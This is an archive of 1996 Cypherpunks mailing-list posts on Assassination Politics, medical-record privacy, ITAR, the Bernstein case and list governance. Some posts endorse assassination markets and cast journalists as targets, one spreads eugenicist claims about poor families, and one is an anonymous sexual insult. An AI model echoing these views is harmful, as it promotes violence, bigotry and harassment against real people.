> Jims ideas as cause for another cyber-scare.  I suspect this is
> because people like Markof are somewhat more responsible.

No, it is not surprizing at all, but you did not seem to have 
understood why:  

1) The dissatisfaction of the population is such that 
many would actively seek where to send their buck to have somebody 
offed.

2) The way AP works, journalists would be priviledged victims, 
paid for by the same disgruntled population

3) More than everything else, they (the journalists) probably
understood *exactly* how AP works and thus fully realised point 2)

> This is not going to stop me from producing an op-ed piece linkiing
> the net libertarians to assasination politics unless I hear a few
> more repudiations of Bell's ideas.

That would be the best way of promoting AP.  Every peoples who favor 
it would say: "Go ahead, it'll be our pleasure!"  

AP will not die for several reason.  The first one is that it only 
requires knowledge and a little coding.  The second is that there is 
a demand.  Prostitution could never be eliminated.  Yet, it does not 
menace the system itself.  AP will be tougher than prostitution and 
it will probably actively seek the system's destruction (as we know 
it).

I suggest you try to understand the mechanics of AP.

jfa

Jean-Francois Avon, Montreal QC Canada
 DePompadour, Societe d'Importation Ltee
    Finest Limoges porcelain and crystal
 JFA Technologies, R&D consultant
    physicists and engineers, LabView programming
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 25 Sep 1996 13:19:02 +0800
To: cypherpunks@toad.com
Subject: Medical Data
Message-ID: <ae6d921400021004c1d5@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



In the public discussions about "medical data bases" and "medical account
numbers," the key issue is being missed. Namely,

Why can't patients carry their _own_ medical records, and disclose what
they wish to disclose to doctors and hospitals, as they see fit? Whether
implemented in a high-tech version, as a "smart card," or a low-tech
version, as a "dossier" (a file folder), the principle's the same.

(I'll get to insurance companies in a moment.)

There is little incentive (*) that I can imagine for any patient to
deliberately lie on his records, as such lying usually harms himself by
providing misleading information to someone who is trying to help him--I
mention this because presumably one of the reasons hospitals and whatnot
keep the records is fear that the records will be altered or not fully
reported. Medical records appear to be a perfect example of Chaum's
"selective disclosure of credentials," or even "credentials without
identity."

(* There is of course some incentive to lie or withold medical information
if the patient deems it invasive of his privacy, or something that he does
not want on records accessible to others. But in a _specific medical
treatment_, for example, he gains little by denying that he had measles as
a child, or that he has used IV drugs. Provided he can disclose this
information without being added to a data base--e.g., by using selective
disclosure of information (and not his name)--the incentives for lying are
small, possibly negative.)

Insurers would of course be worried about falsification of records. This
can be handled in several ways. Digitally-signed statements from hospitals
or test services could be required, depending on the policies of the
insurers--the holder of the files, such as the patient, would be unable to
fake or alter such records. Still, when one asks another party to make a
"bet" about one's health, which is what insurance of course is, it's not
surprising that they would want to see to independent verification of one's
assertions. This is largely separable from the issue of disclosing to
doctors and hospitals medical information.

The comparison that is often made between credit records and medical
records is flawed. Credit records are the items of data _from other
people_, e.g., the persons one has borrowed from, the landlords one has
rented from, etc. And with credit records, a person is often inclined to
falsify or withold items (though this is also solved partly with digital
signatures, though not perfectly).

(There are some interesting links with object-oriented programming, with
patient-objects able to maintain their own state. Not true of
creditee-objects, who are not the owners of the credit worthiness judgments
of others.)

This could be an area where actual progress can be made. While many people,
and regulators, have concerns about untraceable digital cash,  it is likely
that the _public_ would find it hard to buy the argument that patients
being responsible for their own medical records would be a dire threat to
the Republic! Thus, while carrying one's own credit record is mostly
unworkable, carrying one's own medical records is completely feasible, and
solves many privacy problems.

--Tim May

(I hope I fixed any scrambled paragraphs...my Mac crashed again (it's been
crashing several times a day, what with all the various semi-incompatible
versions of the Mac OS, extensions, new programs, etc., I have) and I had
to recover the text of what I'd been typing from one of those dreaded--but
very useful--"keystroke capture" programs.)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 25 Sep 1996 13:37:01 +0800
To: cypherpunks@toad.com
Subject: Re: Portal remailer shutting down
Message-ID: <ae6d955e0102100487d7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:03 PM 9/24/96, Hal wrote:
>The ISP which I have used for over five years, portal.com, is going
>out of business at the end of this month (September, 1996).  This means
>that my remailer at hfinney@shell.portal.com will cease operations.
>I had asked that it be removed from the remailer lists a few weeks ago
>due to some problems, so hopefully not many people have been using it
>lately.  But now it will go away for good.
>
>This remailer has been in operation since the fall of 1991.  I believe it
                                               ^^^^^^^^^^^^
You obviously mean "fall of 1992."

Anyway, congratulations on all of your work back then (in 1992 :-)), and
for running it for so long.

I, too, was a Portalite, from 1988-1992 (when I switched to Netcom, which
offered a local POP (point of presence) in Santa Cruz). Portal was the
first major ISP to offer accounts to non-academic users. They were also
heavily used by those who'd signed up with "PC-Pursuit," a flat-rate phone
service which made it feasible to dial-in to Portal from anywhere in the
country. When the plug was pulled on PC-Pursuit, circa mid-89, the
prospects for Portal dimmed as well. (My own usage dropped dramatically
when PC-Pursuit was canned, as dialing-in to Portal directly was costing me
$6-10 an hour, depending on the time of day. Once I got on with Netcom, in
1992, I was able to join various mailing lists, including the Extropians
list and of course  the Cypherpunks list.)

I haven't been following the fortunes of Portal for a couple of years, but
its relative absence from the playing field of Netcom, Best, Earthlink,
etc. has been pretty noticeable. So I can't say I'm surprised it's going
away.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 25 Sep 1996 09:48:13 +0800
To: cypherpunks@toad.com
Subject: Re: LACC: Re: Australia now has information police
In-Reply-To: <Pine.A32.3.91.960924122022.12846A-100000@tesla.cc.uottawa.ca>
Message-ID: <4DuRuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:

> 
> 
> On Sun, 22 Sep 1996, Julian Assange wrote:
> 
> > [re COCOM trade agreements]
> > 
> > All COCOM countries most likely. That said Australia does not seem to be
> 
> Didn't the COCOM treaty expire?

No; rather the COCOM members had a meeting and voted to dissolve it. 
It happened some time around 1992 or 93, I think.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 25 Sep 1996 15:39:15 +0800
To: cypherpunks@toad.com
Subject: Namibia, Marxists,  and Peaceful Transitions
Message-ID: <ae6d985c020210043bb9@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:02 PM 9/24/96, stewarts@ix.netcom.com wrote:

>People have been imposing their will on others in Ireland for 800 years,
>and killing off the more prominent members of the opposition has been
>a long-term policy of the thugs who've been doing it.  Today there are
>at least three competing gangs of thugs trying to impose their will on
>others by force.   The Protestants are afraid that the Catholic majority
>on the island will enforce their rule on them, and the Catholics in the north
>are afraid that the Protestants will enforce their rule on them,
>both with good reason as near as I can tell.  At least a few years ago,
>the IRA were spouting Marxist rhetoric and wanted to impose their
>Marxist thuggery on the whole island.  The Queen's Empire's army
...

Apropos of this (but not apropos of mathematical cryptography :-}), I read
an amazing article, an uplifting article, a few years ago in the WSJ. The
article was about Namibia, the country to the northwest of South Africa.
Also known at times as "South-West Africa."


(Being a Pynchon fan, Namibia and its Hereros had always had some interest
to me.)

South Africa was involved in a war/occupation situation with Namibia for
many decades, with hit teams deployed to Windhoek to kill off opponents,
etc. A bad situation all around. Some similarities with the situation in
Northern Ireland.

The leader of the opposition--which I think was called SWAPO, though that
might have been Angola...anyway, some alphabet soup name like SWAPO--was a
U.S.-trained college professor-type dyed-in-the-wool Marxist theoretician.
He lived for years in Harlem and wrote articles about the coming Marxist
paradise in Namibia. Rhetoric about driving out the parasites that prey
upon the body of the people, seizing the means of production, yadda yadda
yadda. All the usual Marxist stuff.

Well, South Africa pulled out. Some sort of "peaceful transition" was
arrived at, and the Marxists moved in. Except they almost immediately
abandoned their Marxist rhetoric (which was approximately coincident with
the collapse of Communism and the Berlin Wall, U.S.S.R., etc., so this may
have had something to do with their loss of Marxist faith).

The long and short of it is that the Namibian economy is doing well,
relations with South Africa are good (also helped by changes in RSA's
government one has to assume), the citizens are happy, AP-type killings
have stopped, and both blacks and whites appear to be getting along fine.
After reading the article, and seeing an interesting Namibian-made movie
called "Dust Devil," I decided I would one day visit Namibidia as a
tourist.

(The article was a stunning one, the kind that the WSJ is able to sometimes
do so well. I clipped it out, but have long since lost track of it. If
anybody finds it in any online archives, I would appreciate getting a
copy.)

Whether Northern Ireland could be handled so felicitously is not clear,
though I suspect the North could be absorbed into the Republic of Ireland
easily and without "summary executions" of Protestants. Ireland--the
Republic--is doing pretty well, has lots of high-tech plants (including a
massive Intel chip factory near Limerick) and I think even the Northern
Ireland Protestants would end up better off under Irish rule.

(While many of us dislike the basic notion of "Irish rule," surely the
nonlocal rule by a country across the Irish Sea is less appropriate than by
the historical and geographic "landmass" of Ireland per se?)

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 25 Sep 1996 13:09:51 +0800
To: cypherpunks@toad.com
Subject: Re: Public Schools
In-Reply-To: <Pine.SOL.3.93.960924093951.2049C-100000@stiletto.acadian.net>
Message-ID: <20uRuD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering <pgf@acadian.net> writes:

> On Mon, 23 Sep 1996, Dr.Dimitri Vulis KOTM wrote:
> 
> > 
> > U.S. public school system is darwinian evolution in action. Parents who can
> > afford to send their kids to private schools, do so. Parents who send their
> > kids to public schools deserve to have their offsprings fucked up, mentally
> > and phsyically, to improve the species' gene pool.
> 
> But the cutoff is often whether the parents can afford to send their kids
> to private school, not whether or not they're genetically superior.

You must have attended a public school if you don't understand that geentic
superiority leads to economic success.  My older kid goes to a private school.
The parents are obviously genetically superior to public school parents.

> And the reason it costs so much to send a kid to private school is that
> everyone's already paying for a more expensive public school thanks to all
> the taxes.

Push vouchers. What's the cryptorelevance of your comments, anyway?

> > There are plenty of excellent private elementary and secondary schools in t
> > U.S. Children who deserve better schooling (by virtue of having parents who
> > have better genes and are therefore economically successful) get it.
> 
> So if I'm economically successful it'll change my genes?
> 
> I guess this is the famous Russian belief in Lamarkianism in action.
No, on the contrary, sending poor kids to good schools on scholarships
does not improve their genes. They tend to become drug dealers.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Wed, 25 Sep 1996 08:45:15 +0800
To: cypherpunks@toad.com
Subject: Good article on inevitability of unregulated crypto ...
Message-ID: <199609242141.OAA05593@ohio.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



    http://www.zdnet.com/intweek/print/960624/cover/doc1.html

This, of course, is not any indication that we should not stay
vigilant.  As is clear from every public statement by the past
and present administrations, they have an agenda to protect
their monopoly on intelligence gathering.  They clearly have a
strong interest in hamstringing every single challenge to the
current regulations.  If ITAR is torn down, then they will use
the OECD and other international organizations to stop the
flow of encryption.  It is NOT useful to reason with them.

It takes direct confrontation using legislation and court case
battles to fix this problem.

Ern




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Wed, 25 Sep 1996 13:30:20 +0800
To: cypherpunks@toad.com
Subject: The daily word of caution regarding Timmy May
Message-ID: <199609242059.OAA27794@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timmy May studied yoga back-streching exercises 
for five years so he could blow himself (nobody 
else will).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 25 Sep 1996 07:22:15 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: The Nature of the Cypherpunks List
In-Reply-To: <ae6d639401021004d1fd@[207.167.93.63]>
Message-ID: <199609241913.PAA19989@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> While some folks would rather we talked only about "crypto," just how many
> times can basic questions about Diffie-Hellman, or RSA, or elliptic curves
> be discussed?

I think a better question is "do we need to have to make sure people
are posting for the sake of posting? Why must we have a charter broad
enough to generate too much volume to allow conversation?"

Sure, there is a limit to what can be said about cryptography and the
direct politics of cryptography. *THAT IS THE POINT*. That is why I'm
starting a new list -- so that I can abandon this waste heap to those
that like frolicking in the mire.

> And as I was there at the initial planning meeting in July of '92, and then
> at the first physical meeting, I can assure you that what soon became
> "Cypherpunks" was never intended to be an announcement list for research
> discoveries in mathematical cryptography!

No. It was intended for discussion of cryptography *and* the politics
of cryptography. Not theories about some airliner was shot down by
aliens, not random musings on "assasination politics". The idea was
never to be restricted just to the technical aspects of cryptography,
but the notion was to have a place where the non-technical discussion
also was on *cryptography*. This list no longer has *any* charter. A
posting on sexual practices in Botswana is probably as "on topic" as
anything else these days.

The new list, however, will have a charter, and it *will* be enforced.

> Much as some have been shrilly claiming "This list is for crypto and
> programming discussions only," this was *never* the intent.

Tim, I hate to say this, but cypherpunks is a sewer which has driven
off anyone seriously interested in the area, and you are part of the
reason.

> The serious crypto researchers, e.g., the Matt Blazes, the Whit Diffies,
> and the Carl Ellisons of the world, have various channels they use to
> communicate in.

For those who can think back a few years, this *used* to be one of
those fora. No longer, of course. This is not for people serious about
anything. I no longer read 99% of what is posted here -- its drek.

I do not believe it would be good, however, for the list to be shut
down, because there have to be sewers to carry the world's
intellectual waste products, and if this list did not exist the likes
of Jim Bell and the others would be out causing harm on other mailing
lists.

Perry

PS Still looking for a solid site that can host a 1500 member
significant volume mailing list without choking.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Wed, 25 Sep 1996 03:33:36 +0800
To: hallam@vesuvius.ai.mit.edu
Subject: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!]
Message-ID: <199609241518.JAA08759@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


At 2:10 AM 9/24/96, hallam@vesuvius.ai.mit.edu wrote:

>like Markof are somewhat more responsible. This is not going to stop
me >from producing an op-ed piece linkiing the net libertarians to
assasination >politics unless I hear a few more repudiations of Bell's
ideas. If you >don't very clearly reject his murderous ideas you are
going to regret it >just as the left regreted having the USSR or the
RAF associated with them.

        hallam-baker:  

        go back to your beloved England and your labour unions
    disguised as professional societies. stand on top of the ivory
    tower and enjoy the view --at least get the top of it out of your
    anal cavity.  try leaving your closet, and smell the flowers. the
    british are behaving like wimps with their capitulation on privacy
    and any semblance of gun rights.

        I'll cast my vote with Tim May --talk in terms of extortion,
    and I'll tell you what you wish to hear:  

        NO, I will not outright reject Jim Bell's "Assassination
Politics."
    As Jefferson said:

            "God forbid we should ever be 20 years without such a 
            rebellion. . . . What country can preserve it's liberties
if 
            their rulers are not warned from time to time that their
            people preserve the spirit of resistance?. . .The tree of
            liberty must be refreshed from time to time with the blood
            of patriots and tyrants."

        also, piss off.  we can defend american rights without a dawg-
    eared Brit liberal foaming at the mouth.

        as to regretting it --I doubt it.

        the second amendment was written with the idea of a populace
    who retains their personal rights and is not just another slave to
    the mafia/fascist form of government which the US has become.

        something a brit pansy  _certainly_ would not understand:

                LIBERTY IS WORTH DYING FOR!

--
one of the few things we all share: 
  the utter, corrosive contempt for our elected officials.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 25 Sep 1996 07:21:36 +0800
To: attila <attila@primenet.com>
Subject: Re: SAY WHAT? [Hallam-Baker demands more repudiations or he'll write!]
In-Reply-To: <199609241518.JAA08759@InfoWest.COM>
Message-ID: <Pine.SUN.3.91.960924143919.28504B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Sep 1996, attila wrote:

> 
>         go back to your beloved England and your labour unions
			your roots are showing :-) ----^

>         NO, I will not outright reject Jim Bell's "Assassination
> Politics."

Assasination politics is  impossible to defend from a classical 
Liberal/Libertarian position. Bell advocates arbitrary applications of 
violence and coercion without restriction. There is no way to justify the 
initiation of force without abandoning any pretence of being a 
Libertarian (which, to be fair, Bell doesn't claim to be).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Wed, 25 Sep 1996 14:40:17 +0800
To: DMiskell@envirolink.org
Subject: Re: Banning annoying users
In-Reply-To: <199609241158.HAA27269@envirolink.org>
Message-ID: <199609242021.PAA07861@homeport.org>
MIME-Version: 1.0
Content-Type: text


Daniel Miskell wrote:

| The
| not allowing unsubscribed individuals to post is logical, for a time.  But
| that basically outlaws anon remailers that don't allow you to send to an
| account, and a lot of them don't, from my limited understanding.  Besides, if
| we set up the list to ban people who are 'undesirable', instead of just using
| our own killfiles to do the dirty work for the list, then what is to stop

	If non-subscribers, aka remailers are banned from cypherpunks,
I'll personally subscribe every remailer to the list.  Be a good
exercise in writing filters for the remailers.

	Saying that you can't deal with immature people using
remailers, and thus they should be banned from cypherpunks is ammo to
our opponents, who will sieze the opportunity to say, 'See, even
cypherpunks can't deal with anonymity.'

	The list has gone way downhill, but offers a forum unavailable
elsewhere online.  As Tim points out, you can contribute or leave.
I'm trying to contribute.

	As a basic rule of thumb, if your posts are generating lots of
flames, you're not contributing, you're arguing.  (He says to generate
flames.)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ravi Pandya <rpandya@netcom.com>
Date: Wed, 25 Sep 1996 13:21:17 +0800
To: cypherpunks@toad.com
Subject: Private Information Retrieval
Message-ID: <2.2.32.19960924222443.006964e8@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


This work looks like it might be of interest to readers of this list.

Ravi
--- On Tue, 24 Sep 1996 14:52:08 -0700 (PDT)  Scott Dakins
<sjdakins@cs.washington.edu> wrote:
UNIVERSITY OF WASHINGTON
Seattle, Washington 98195

Department of Computer Science and Engineering
Box 352350
(206) 543-1695

COLLOQUIUM

SPEAKER:	Benny Chor, 
		Technion, Haifa, Israel

TITLE:		Private Information Retrieval

DATE:		Wednesday, September 25, 1996

TIME:		3:30 pm

PLACE:		422 Sieg Hall

HOST:		Richard Karp

ABSTRACT:

Publicly accessible databases are an indispensable resource for retrieving  
up to date information. But they also pose a significant risk to the 
privacy of the user, since a curious database operator can follow the user's 
queries and infer what the user  is after. Indeed, in cases where the 
users' intentions are to be kept secret, users are often cautious about 
accessing the database. It can be shown that when accessing a single 
database, to completely guarantee the privacy of the user, the whole database
should be downloaded , namely $n$ bits should be communicated (where $n$ is 
the number of bits in the database).
 
In this work, we investigate whether by replicating the database, more
efficient solutions to the private retrieval problem can be obtained. 
We describe schemes that enable a user to access $k$ replicated copies of
a database ($k\geq 2$) and privately retrieve information stored in the
database. This means that each individual database gets no information on
the identity of the item retrieved by the user. These schemes use the
replication to gain substantial saving.

In the talk, I will describe the original work on this topic (joint work
with Oded Goldreich, Eyal Kushilevitz, and Madhu Sudan), as well as recent
developments in this area. 



Refreshments to follow.

Email: talk-info@cs.washington.edu

Info: http://www.cs.washington.edu




---------------End of Original Message-----------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 25 Sep 1996 01:53:08 +0800
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: provably hard PK cryptosystems
In-Reply-To: <Pine.HPP.3.91.960923182407.12499B-100000@cor.sos.sll.se>
Message-ID: <3247E194.3F54BC7E@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Asgaard wrote:
> 
> On Sun, 22 Sep 1996, Timothy C. May wrote:
> 
> > Suppose a tile is placed at some place on the grid, and another tile
> > (possibly a different tile, possibly the same type of tile) is placed some
> > distance away on the grid. The problem is this: Can a "domino snake" be
> > found which reaches from the first tile to the second tile, with the
> > constraint that edges must match up on all tiles? (And all tiles must be in
> > normal grid locations, of course)
> 
> Intuitively (but very well not, I'm not informed enough to know)
> this might be a suitable problem for Hellman's DNA computer, the
> one used for chaining the shortest route including a defined
> number of cities?

This is starting to sound like Wired magazine.

I fail to see *any* (non educational) use for these DNA "computers", let
alone a cryptographic use - sure, they may be massively parallel, but
what's the big deal?  I can now perform a calculation a million times
faster than I could yesterday? (something I personally doubt, but will
agree to for sake of the argument).  I could get the same results
writing a cycle stealing Internet java app, so what's all the fuss
about?

L8r d00d2

DNA Mutant
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Wed, 25 Sep 1996 07:43:41 +0800
To: cypherpunks@toad.com
Subject: Bernstein hrg in the news
Message-ID: <9609241946.AA21891@cow.net>
MIME-Version: 1.0
Content-Type: text/plain


Feds on the Ropes In Suit Challenging Arms Export Law
(Dan Goodin, The Recorder (SF), 9/23/96, p.1)

	A professor who says federal restrictions on the export of encryption
software violate his right to free speech seemed to get a sympathetic
hearing from a federal judge on Friday.

	In a closely watched case challenging export restrictions on encryption
software, U.S. District Judge Marilyn Hall Patel did not rule on summary
judgment motions. But she appeared impatient when a U.S. Department of
Justice attorney attempted to revive an issue settled months ago in that case.

	Patel handed plaintiff Daniel Bernstein a big victory in April, ruling
that software is protected speech under the First Amendment.

	But the ruling in _Bernstein v. U.S. Department of State_, 95-0582, didn't
deter government attorneys Friday from trying to reargue the point.

	Justice Department trial attorney Anthony Coppolino argued that the
government controls on the export of software are not based on the content
of the computer code but rather on its functionality. Therefore, he argued,
the restrictions are not a prior restraint of speech protected under the
Constitution.

	Patel replied: "You'll get a chance to argue that in another courtroom."

	Cindy Cohn, an associate with San Mateo's McGlashan & Sarrail representing
Bernstein, said she was pleased with the way the hearing appeared to go.

	"My impression is the fact that [Patel] was asking more questions of
[Coppolino] than me meant that he was the one who needed to convince her,"
Cohn said.

	Coppolino declined to comment.

	LICENSE TO 'SNUFFLE'

	Filed in February 1995, the suit challenges provisions of the
International Traffic in Arms Regulation Act, which classifies encryption
programs as "munitions" and subjects them to strict export controls.

	In October 1993, the U.S. State Department told Bernstein he would need an
arms export license to post his "Snuffle" encryption program and
accompanying documentation to an Internet discussion group. He subsequently
filed suit seeking to have the requirement declared unconstitutional.

	After Patel's April ruling, the case now turns on whether restrictions on
the export of such software and accompanying "technical data" amount to
prior restraint, which can only be exercised extremely narrowly.

	High-tech companies are closely watching the case, having complained
bitterly for years that the law has crippled their ability to compete in
the global software market. Particularly in the burgeoning arena of
Internet and network-related software products, encryption features are
considered essential to protect sensitive data transmissions from
unauthorized access.

	Legislative attempts at relaxing export laws so far have been
unsuccessful. A bill now before the Senate Commerce Committee has received
stiff opposition from the Clinton administration, and even its supporters
say it is unlikely the bill will pass this term.

	But Stanton McCandlish, a spokesman for the Electronic Frontier Foundation
- a group that advocates extending civil liberties into digital media such
as the Internet - said the so-called Pro-CODE bill sponsored by Sen. Conrad
Burns, R-Mont, could be made moot by Bernstein's case.

	"If we get the ruling we're looking for," he said, "and it's affirmed at
the Supreme Court level, which is pretty likely, the Pro-CODE bill is
probably not needed at all."

(retyping by NLA, newspaper liberation army.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bovine Remailer <haystack@cow.net>
Date: Wed, 25 Sep 1996 07:37:36 +0800
To: cypherpunks@toad.com
Subject: Universal Avatar spec
Message-ID: <9609241955.AA21939@cow.net>
MIME-Version: 1.0
Content-Type: text/plain



IBM, Velocity, and Chaco team up for identity on the net:

http://www.chaco.com/avatar/avatar.html
> The real power of Universal Avatars comes from the inclusion of
> other capabilities into the system. First, consider the implications
> of embedding a public key, or Netscape certificate, into the
> Universal Avatar file. By introducing secure communications, the
> avatar can effect instantaneous financial micro-transactions
> seamlessly in a virtual world. For example, an avatar could walk
> through a virtual mall and transparently purchase items. Since his/her
> profile is under the strict control of the user, s/he could declare
> an interest in modems. Virtual stores could then automate the process
> of discovering where the potential customer's interests lie, while
> keeping the customer's personal information strictly confidential and
> email address safe from spamming. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Wed, 25 Sep 1996 02:04:59 +0800
To: cypherpunks@toad.com
Subject: Re: Hallam-Baker demands more repudiations or he'll write!
In-Reply-To: <ae6ca7190a021004d21c@[207.167.93.63]>
Message-ID: <3247E8DF.FF6D5DF@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 2:10 AM 9/24/96, hallam@vesuvius.ai.mit.edu wrote:
> 
> >like Markof are somewhat more responsible. This is not going to stop me
> >from producing an op-ed piece linkiing the net libertarians to assasination
> >politics unless I hear a few more repudiations of Bell's ideas. If you
> >don't very clearly reject his murderous ideas you are going to regret it
> >just as the left regreted having the USSR or the RAF associated with them.
> 
> I for one don't respond well to extortion threats, so write your damned article.

Seconded.

You know, the real problem with the average blackmailer is that they
rarely give you the offer as a legal document - if we fulfil our side of
the bargain, how can we be sure he fulfils his, and doesn't change his
mind next time someone half agrees with a pro
AP/Legal-blackmail/Tax-haven/Libertarian-state/freedom-of-speech/whatever
post?  We obviously need some sort of legal contract to solve this
problem, but no, that's not possible in most countries, is it?.  How
convenient.  Till next time Phill ...

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Fricker <jfricker@vertexgroup.com>
Date: Wed, 25 Sep 1996 11:14:45 +0800
To: cypherpunks@toad.com
Subject: FLITE is now on the web
Message-ID: <19960924225444242.AAA196@dev.vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

  http://www.fedworld.gov/supcourt/index.htm

7000 supreme court decisions from 1937 to 1975

-----BEGIN PGP SIGNATURE-----
Version: 2.9

iQCVAgUBMkhnzbuA0owOB/fpAQEKWwQArJwMFrL5kVXSYfNC9I8T8bzi+8D8Zdma
vZj84TB+2KmW28wuFvbxnVE02MT4DMkwTYR8NQpGfAxsHHkOCOzkasdVB1IRpnpP
RUuZsyQ3Iabm3q7INywMcy+c+u+5bl6stzYAlKVypsmPYJh0J9TSnhH5zN+xdowG
/6dj+90GGNc=
=/4qd
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Wed, 25 Sep 1996 13:53:18 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: Bernstein hearing: The Press Release
Message-ID: <3.0b19.32.19960924160043.006edf48@ricochet.net>
MIME-Version: 1.0
Content-Type: text/plain



>And the ITARs are only executive orders, no? Not laws, right? I'm curious 
>as to why they're considered valid. Anyone know?

They're administrative regulations. Legislative bodies (like Congress and
state legislatures) can delegate some of their legislative authority to
executive agencies (like the Forest Service or the State Dept) to make
rules which have the force of law. This is done because legislatures don't
have time to write all of the laws that bureaucrats think ought to be
written - so the legislature says "Fine, write your own damn laws."

Legislatures don't want to bother with deciding where you can build a fire
on federal lands or exactly how close you can fly to an airport if you're
not taking off or landing or what happens to undeliverable mail at the Post
Office. So legislatures give some of their lawmaking power to the agencies
that are in a position to see what needs to be regulated. The delegation of
power is limited by superior law (e.g., statutes written by the
legislature) and the regulatory duties of the agency (such that the Forest
Service can't write regs for the FAA, etc.) and by the grant of power itself.

This sounds like cops making up their own laws - and it is, but they have
to act like legislatures when they do it. This means that they must
(generally) publish proposed regs, accept comments, ignore them, and then
publish final regulations. Agencies can't change the regs on a daily or a
case-by-case basis, or change them without making the changes public. (But
"public" means "buried somewhere in the Federal Register".) 

And that's what the ITAR is - a body of administrative law developed by the
executive branch pursuant to a grant of power from Congress. (e.g., 22 USC
2778(a)(1), ". . . The President is authorized to designate those items
which shall be considered as defense articles and defense services for the
purposes of this section and to promulgate regulations for the import and
export of such articles and services. The items so designated shall
constitute the United States Munitions List.") It is subject to review by
the courts just like the product of Congress itself; and an agency can't do
